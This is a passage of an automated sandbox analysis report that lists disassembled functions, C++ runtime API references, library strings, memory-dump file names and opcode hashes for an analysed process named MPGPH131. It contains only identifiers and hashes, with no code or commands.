Instruction Fuzzy Hash: E4F0E93260962D669F236B278C15BBB3B489F41760B1A8111EE449A1D4CB20EE0082E4

Function 003F44ED Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,003DDD3B,?,?,?,?,?,00302D8D,003DADBC,?,?,003DADBC), ref: 003F4520

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
Instruction ID: f2b67d1a62386c44c578e7823dc5d8404d0a8f6049834e268de7125030f2c91f
Opcode Fuzzy Hash: 48bbdbba7a1362da4fdd152043ef7dda22bb3a28d4d0da1928596669ed205972
Instruction Fuzzy Hash: C3E09B3110162D57D6233A655C0177B3A8DDF833B1F160121EF4C9A1D1DB50DE0041E5

Function 04E20129 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92979d71bb11ca57e8eed4608918fcdd0df8007edfb7c2d8752b79d4bc3e648b
Instruction ID: a6246072a18dae6da5bcd760303db7d9957985d27e431a6b6d0cbd64ef12adb7
Opcode Fuzzy Hash: 92979d71bb11ca57e8eed4608918fcdd0df8007edfb7c2d8752b79d4bc3e648b
Instruction Fuzzy Hash: EB11D3EB20C220BEF24286916B545F72B6AEBD7730330556BB647DB283F2941E49B131

Function 04E20180 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cbf5753aba7b83bc047c1a9ff16d7c6273a2515a117bdb07dec74acae5c91bd
Instruction ID: a1440a4c6e5e764cbb2679951c1bfa026fe0e9ea7972205f5021181704977bbe
Opcode Fuzzy Hash: 3cbf5753aba7b83bc047c1a9ff16d7c6273a2515a117bdb07dec74acae5c91bd
Instruction Fuzzy Hash: A91108E724C360BEE24281956B449F67BAAABE763033054ABF543CB243F5941E5DA132

Function 04E20174 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff9c22538f5e4f69f313e86ecc95afc18d1d25c7f370627f3fe63087aacae7b0
Instruction ID: 4b925b1f90ee71187dfe2dc2354b7d5bc4695bc4cd3aad365575a20899b6bb6d
Opcode Fuzzy Hash: ff9c22538f5e4f69f313e86ecc95afc18d1d25c7f370627f3fe63087aacae7b0
Instruction Fuzzy Hash: F211ADEB24C230BDF14281956B54AF66BAAA7E7730330A567F607DB283F6941E487131

Function 04E201DA Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22e576e3728135e4afdddd416a1a38b00c3ed936787e16eb7b9c8322a098d661
Instruction ID: 5842613c2c92e34e1a8c6ebe714803e1c35537ccd1a4f07eb137bf3f619de848
Opcode Fuzzy Hash: 22e576e3728135e4afdddd416a1a38b00c3ed936787e16eb7b9c8322a098d661
Instruction Fuzzy Hash: E811E1EB24C230BDF10281816B54AF7675AA7E7730330A567F603D6283F2951E8D7031

Function 04E201E8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125d3fab895d0dd8c8970d9d6f2cdfb7cddd93f464023d6985faea0eb0b0f2e7
Instruction ID: d159bd7ccb971e150894dbc015b2f1ce2b2ebbcc7fe3e0b79e44e202061131bd
Opcode Fuzzy Hash: 125d3fab895d0dd8c8970d9d6f2cdfb7cddd93f464023d6985faea0eb0b0f2e7
Instruction Fuzzy Hash: B601D1EB348224AEE10281816B14AF767A9A7E6730330A467F503C6183F1D41A8D6130

Function 04E201C6 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de50d601a686c1cd6095e0aebd4a1688d73051f6e1116b44b9db8628a6d79005
Instruction ID: 2e614aed656a2c9eaf597a708ab41611c22dffdded5e5c4775c98f8bb3d2a95f
Opcode Fuzzy Hash: de50d601a686c1cd6095e0aebd4a1688d73051f6e1116b44b9db8628a6d79005
Instruction Fuzzy Hash: 8901D6EB34C220ADF201818167546F66BA9E7D6670330A827F507C6283F5845E8D6030

Function 04E20206 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd4dd9873ce16ac57abf2c84fdb34d70bb7f66cc0bcdb6093fb03183b08af67
Instruction ID: 8568345126cc384ead5a4e9a28a03a50c262e80dd4fb2fd8d7e65d1a550b574d
Opcode Fuzzy Hash: 8fd4dd9873ce16ac57abf2c84fdb34d70bb7f66cc0bcdb6093fb03183b08af67
Instruction Fuzzy Hash: 4BF0A4AB34C230ADF242858177546F667AAA7D6730330A56BF607D6283F5841E8D7135

Function 04E20216 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde33899d72c6fe8421726768a0d646a25fa1d599c1d03d44164d0280075ab85
Instruction ID: ff16c751b38d1c4f6c735ce63831267e3617c2886d27d6ef6a870aef1cf8bb45
Opcode Fuzzy Hash: dde33899d72c6fe8421726768a0d646a25fa1d599c1d03d44164d0280075ab85
Instruction Fuzzy Hash: B8F028EB24C1307DE24381902B946F62BE9E6D67313309867F502C6183F0994A4E6131

Function 04E2023B Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3744558260.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4e20000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb327f6309abd6440015245fbaad474a5fb7a469caf6dc7bdacfea7f465dae4
Instruction ID: 2c7aa361b5af77a62a9df0015f65f5fbc9a99167279f7111b25a3bc0103cc76c
Opcode Fuzzy Hash: 2cb327f6309abd6440015245fbaad474a5fb7a469caf6dc7bdacfea7f465dae4
Instruction Fuzzy Hash: ACF0247B24C2619ED20291A15B592FBBBA27AD363033480BFB00383183F186066EA231

Non-executed Functions

Function 0036AB20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0036AB43
std::_Lockit::_Lockit.LIBCPMT ref: 0036AB65
std::_Lockit::~_Lockit.LIBCPMT ref: 0036AB85
std::_Lockit::~_Lockit.LIBCPMT ref: 0036ABAF
std::_Lockit::_Lockit.LIBCPMT ref: 0036AC1D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0036AC69
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0036AC83
std::_Lockit::~_Lockit.LIBCPMT ref: 0036AD18
std::_Facet_Register.LIBCPMT ref: 0036AD25

Strings

bad locale name, xrefs: 0036AD3F

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
Instruction ID: 8ed83c4bf32e4a088e00ef6afd7357ab54a73a4cc0887222c61e80e59981a903
Opcode Fuzzy Hash: 12b3f523608795b329e3739ccb8fa136d4f59c13fc9856968535082e6fd5af66
Instruction Fuzzy Hash: A4616DB1D00654EBDF12DFA4E845B9EBBB4AF05350F158069E805BB385EB34E905CB92

Function 00303770 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003037E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00303835
__Getctype.LIBCPMT ref: 0030384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0030386A
std::_Lockit::~_Lockit.LIBCPMT ref: 003038FF

Strings

bad locale name, xrefs: 0030391C
0:0, xrefs: 00303848

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:0$bad locale name
API String ID: 1840309910-4031232150
Opcode ID: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
Instruction ID: 01eb59dafb34fb1ff82779f4316e4150010fd20131b441804df82b701eb642db
Opcode Fuzzy Hash: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
Instruction Fuzzy Hash: F35170B2D01358DBDB11DFA5D84579EFBB8AF14310F14816AE804AB381E775EA08CB92

Function 003E04D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 003E0507
___except_validate_context_record.LIBVCRUNTIME ref: 003E050F
_ValidateLocalCookies.LIBCMT ref: 003E0598
__IsNonwritableInCurrentImage.LIBCMT ref: 003E05C3
_ValidateLocalCookies.LIBCMT ref: 003E0618

Strings

csm, xrefs: 003E05AD

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
Instruction ID: 10bd7e8b6b971bce6a7c6884c50d8b9da0b04311c2ac9e009dd9132f32610af8
Opcode Fuzzy Hash: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
Instruction Fuzzy Hash: 4041F930A042689FCF15DF6AC880A9E7BB4EF45324F148265E814AB3D2D775EA45CF90

Function 00369240 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00369263
std::_Lockit::_Lockit.LIBCPMT ref: 00369286
std::_Lockit::~_Lockit.LIBCPMT ref: 003692A6
std::_Facet_Register.LIBCPMT ref: 0036931B
std::_Lockit::~_Lockit.LIBCPMT ref: 00369333
Concurrency::cancel_current_task.LIBCPMT ref: 0036934B

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
Instruction ID: ce1bbed4086bdb84c1689671a2ab429c6f1faae71d7c491f2153452dd4c730c1
Opcode Fuzzy Hash: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
Instruction Fuzzy Hash: 06419F72D00219EFCB12DF54E841BAABBB8FB45720F15866AE805AB395D730AD05CBD1

Function 00305DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003060F2
___std_exception_destroy.LIBVCRUNTIME ref: 0030617F
___std_exception_copy.LIBVCRUNTIME ref: 00306248

Strings

recursive_directory_iterator::operator++, xrefs: 003061CC

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
Instruction ID: df072d40c7f1576c86225e5aaa5301835358dfd088cb5909c9d26423467974f5
Opcode Fuzzy Hash: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
Instruction Fuzzy Hash: 1EE133B19106049FDB2ADF68D855BAEB7F9FF44300F10862EE44297781E774AA44CBA0

Function 003084C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003086DE
___std_exception_destroy.LIBVCRUNTIME ref: 003086ED

Strings

, column , xrefs: 00308555, 0030856B
at line , xrefs: 00308518

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
Instruction ID: b97806acc45bb8f9c38d3217fb3f8b91183af05f3695769a54b13205c33c74af
Opcode Fuzzy Hash: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
Instruction Fuzzy Hash: 1B618871E102089FDB0ACF68DC95B9EBBB5FF45310F148619E451AB7C2EB74AA80C794

Function 00373150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00374109
___std_exception_destroy.LIBVCRUNTIME ref: 00374122

Strings

value, xrefs: 0037402F

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
Instruction ID: c0db098467623bca59eca7c8ee1362f6bae71f043de259ca8ba3a90901e0d558
Opcode Fuzzy Hash: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
Instruction Fuzzy Hash: 8151D3B1C00258DFDF25DFA4DC85BDEBBB5AF05304F148259E449AB382D7786A88CB61

Function 00303B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00303C0F

Strings

ios_base::failbit set, xrefs: 00303AC8, 00303BB1
ios_base::badbit set, xrefs: 00303BA7, 00303BD2, 00303BF3
ios_base::eofbit set, xrefs: 00303BB6

Memory Dump Source

Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
